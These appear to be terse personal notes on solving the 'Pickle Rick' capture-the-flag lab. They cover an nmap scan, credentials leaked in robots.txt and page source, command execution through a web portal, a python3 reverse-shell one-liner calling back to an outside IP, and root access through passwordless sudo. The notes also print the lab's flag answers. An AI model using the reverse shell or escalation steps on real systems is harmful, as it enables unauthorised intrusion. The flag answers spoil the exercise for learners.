nmap --> 2 services --> 22 and 80
web --> 
    --> robots.txt --> Wubbalubbadubdub
    --> page source --> username --> `Note to self, remember username! Username: R1ckRul3s`
    --> login --> `R1ckRul3s:Wubbalubbadubdub` --> cmd run on local desktop - `www-data`
        --> ls --> ```Sup3rS3cretPickl3Ingred.txt
                        assets
                        clue.txt
                        denied.php
                        index.html
                        login.php
                        portal.php
                        robots.txt```
        --> cat, more, etc --> not working
        --> less works --> `less Sup3rS3cretPickl3Ingred.txt` --> `mr. meeseek hair`


rev shell --> use the python3 to create rev shell --> `export   RHOST="10.14.50.129";export RPORT=1337;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'`
        --> portal.php --> `// Cant use cat
      $cmds = array("cat", "head", "more", "tail", "nano", "vim", "vi");
      if(isset($_POST["command"])) {
        if(contains($_POST["command"], $cmds)) {
          echo "</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>";`
        --> clue.txt --> `Look around the file system for the other ingredient.` --> cat /home/rick/second ingredients --> `1 jerry tear`

linpeas --> `sudo -l` --> `(ALL) NOPASSWD: ALL` --> `sudo su` --> root
    --> /root --> `cat 3rd.txt` --> `3rd ingredients: fleeb juice`